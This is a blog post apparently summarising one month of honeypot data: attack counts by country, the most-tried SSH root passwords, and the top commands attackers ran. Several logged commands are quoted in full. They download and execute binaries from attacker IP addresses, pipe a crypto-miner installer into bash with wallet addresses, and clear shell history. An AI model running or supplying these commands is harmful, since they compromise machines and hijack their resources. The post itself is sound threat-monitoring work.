Reviewing the honey pot for September we encountered 298,934 attacks from 68 countries and regions. Most attacks originated from the United States with just over 51,000 attacks or around 17% of all attacks.
![](https://www.operationdecode.com/wp-content/uploads/2021/09/image-7.png)
Looking at the number of hits per day it was constant around 15,000 hits, We did see a dip around the 26th for some unknown reason.
![](https://www.operationdecode.com/wp-content/uploads/2021/09/image-8.png)
As mostly bots are hitting the server the most common username and password combo is root/admin with a staggering 80x more request then the next popular username and password combo root/root
root/admin | 26965 |
root/root | 336 |
root/123456 | 90 |
root/1qaz@WSX | 47 |
root/ | 20 |
root/P@ssw0rd | 14 |
root/12345678 | 13 |
root/1 | 13 |
root/0 | 12 |
root/password | 11 |
root/123456789 | 9 |
root/12345 | 9 |
root/123 | 9 |
root/Huawei12#$ | 9 |
root/1234567890 | 8 |
root/1234 | 8 |
root/111111 | 7 |
root/root123 | 7 |
root/000000 | 6 |
root/admin123 | 6 |
With TCP reflection attacks There were more than 2100 URLs targeted this month. We did had a large chunk directed to 96.43.128.70 on port 80 which is holding random scripts. followed bt ya.ru (Yandex).
![](https://www.operationdecode.com/wp-content/uploads/2021/09/image-9.png)
We experienced over 100 different commands attempted to run on the honeypot, Below are the top 20 attacks the most common being uname -a.
We did also see a crypto-miner trying to be installed which I wrote a separate report which can be found here. I dubbed the attack the krane Crypto-miner
CMD: uname -a | 191 |
CMD: uname -s -v -n -r -m | 93 |
CMD: uname -a;lspci | grep -i –color ‘vga\|3d\|2d’;curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 4AXp4BAFuqCUNLJ3X12FKg7jp9MQjiMeWG1bMme9znFNPvhP2LqGXUF5pEfaeMQ7FAArXVWnUAEEMF2Kms6xzjMGVagomWr | 65 |
CMD: cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget 209.141.57.111/ssh || curl -o ssh 209.141.57.111/ssh; tar xvf ssh; cd .ssh; chmod +x *; ./sshd; ./krane 123456 | 57 |
CMD: cat /etc/issue | 50 |
CMD: cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget 209.141.32.204/ssh || curl -o ssh 209.141.32.204/ssh; tar xvf ssh; cd .ssh; chmod +x *; ./sshd; ./krane 1qaz@WSX | 42 |
CMD: apt update -y; yum update -y; apt install curl -y; yum install curl; cat /etc/issue; curl -s -L https://raw.githubusercontent.com/C3Pool/xmrig_setup/master/setup_c3pool_miner.sh | bash -s 4AbDso7DmSjDqQenbJaHvYbuoK1yfZ926UmGqX46THWe2vFSNrRyAzh6aME1cWYT5pMMxH6eiFdc9iecpQn7mm1zLKRxgaV | 36 |
CMD: cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget 209.141.32.157/ssh || curl -o ssh 209.141.32.157/ssh; tar xvf ssh; cd .ssh; chmod +x *; ./sshd; ./krane root | 35 |
CMD: uname -a & lscpu & php -v | 33 |
CMD: /ip cloud print | 31 |
CMD: cat /proc/cpuinfo | 30 |
CMD: echo Hi | cat -n | 28 |
CMD: ifconfig | 28 |
CMD: ls -la /dev/ttyGSM* /dev/ttyUSB-mod* /var/spool/sms/* /var/log/smsd.log /etc/smsd.conf* /usr/bin/qmuxd /var/qmux_connect_socket /etc/config/simman /dev/modem* /var/config/sms/* | 28 |
CMD: ps -ef | grep ‘[Mm]iner’ | 28 |
CMD: ps | grep ‘[Mm]iner’ | 28 |
CMD: cd /tmp; wget http://188.213.49.167/x86_64; curl -O http://188.213.49.167/x86_64; busybox wget http://188.213.49.167/x86_64; chmod 777 *; ./x86_64 newgenroots | 25 |
CMD: uname -a;nproc | 22 |
CMD: cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://85.204.116.180/json; curl -O http://85.204.116.180/json; chmod 777 json; ./json Exploit.x86_64; rm -rf json; history -c | 21 |
CMD: cat /etc/issue; cd /tmp/; rm -rf x86*; wget http://154.16.118.104/x86; chmod 777 *; ./x86 x86xhed | 20 |
Lets see if the numbers remain the same for next month.